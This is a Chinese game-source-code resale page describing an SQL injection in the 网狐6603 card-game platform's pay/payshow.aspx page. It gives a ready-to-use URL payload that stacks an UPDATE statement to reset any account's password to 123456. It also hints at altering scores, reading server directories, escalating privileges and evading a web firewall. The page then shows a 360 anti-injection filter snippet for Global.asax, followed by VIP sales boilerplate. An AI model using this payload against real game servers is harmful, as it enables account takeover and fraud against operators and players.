- 游戏技术文章
网狐6603 SQL注入任意修改数据
时间:2015-9-11 16:52:07 作者:棋牌资源网 来源:棋牌资源网 查看:5713 评论:0内容摘要:先看下网站是否存在pay/payshow.aspx页面。构造:url=http://www.pahuai.com/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.dbo.AccountsInfo%20SET%20Logo...先看下网站是否存在pay/payshow.aspx页面。
构造:url=http://www.pahuai.com/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.dbo.AccountsInfo%20SET%20LogonPass%20=%20'E10ADC3949BA59ABBE56E057F20F883E'%20WHERE%20accounts%20=用户名%20--E10ADC3949BA59ABBE56E057F20F883E=MD5(123456)
直接访问URL,看看密码是不是变成123456了。自己构造别的语句,可以修改任意分数,读取服务器目录,提权...........(安全狗可以拦截掉的,方法是:........自己想办法)其他页面也有这样的BUG。
以下是360通用sql防注入方法。
---------------------------------------------使用方法---------------------------------------------
1.将App_Code目录拷贝到web根目录假如已经存在App_Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前的App_Code目录即可。2.将Global.asax文件拷贝到web根目录假如已经存在Global.asax文件,那直接把下面这段代码
voidApplication_BeginRequest(objectsender,EventArgse){if(Request.Cookies!=null){if(safe_360.CookieData()){Response.Write("您提交的Cookie数据有恶意字符!");Response.End();}}if(Request.UrlReferrer!=null){if(safe_360.referer()){Response.Write("您提交的Referrer数据有恶意字符!");Response.End();}}if(Request.RequestType.ToUpper()=="POST")
- `3 ?! L6 J4 t& n% Z+ U{if(safe_360.PostData()){Response.Write("您提交的Post数据有恶意字符!");Response.End();}}if(Request.RequestType.ToUpper()=="GET"){if(safe_360.GetData()){Response.Write("您提交的Get数据有恶意字符!");Response.End();}}}
拷贝到当前的Global.asax文件里保存。
欢迎加入VIP,【VIP售价:只要288元永久VIP会员】畅享商业棋牌游戏程序下载,点击开通!
下载说明
☉本站所有源码和资源均由站长亲自测试-绝对保证都可以架设,运营!
☉如源码和资源有损坏或所有链接均不能下载,请告知管理员,☉本站软件和源码大部分为站长独资,资源购买和收集,放心下载!
☉唯一站长QQ:1004003180 [人格担保-本站注重诚信!]
☉购买建议E-mail:1004003180@qq.com 源码收购 E-mail:1004003180@qq.com
☉本站文件解压密码 【文章内都自带解压密码,每个密码不同!】
- 本类推荐
- 本类排行
-
10-30Androidkiller未检测到Java SDK环境怎么办
-
10-30未检测到Java SDK 环境-Java环境变量设置-Java开发环境搭建
-
10-30Android反编译工具的使用-Android Killer
-
10-8sqlserver2005 安装图解教程以及SQL 2005 SP3补丁安装图文教程
-
1-1SRC漏洞挖掘必备的12款浏览器插件(附下载地址)
-
11-6网络管理员必备的10个优秀的日志分析工具
-
3-24网络推广之20种新手引流推广方案详解
-
11-21【站长推荐阅读】竞价排名暴利赚钱的公开秘密
-
1-11C语言震荡波病毒源代码
-
4-3AG、BBIN、PT、MG、TTG、SA、DT、BS、PNG、MW、SW、CQ9、PP、PG、AB、OG等多款api开户游戏体验
-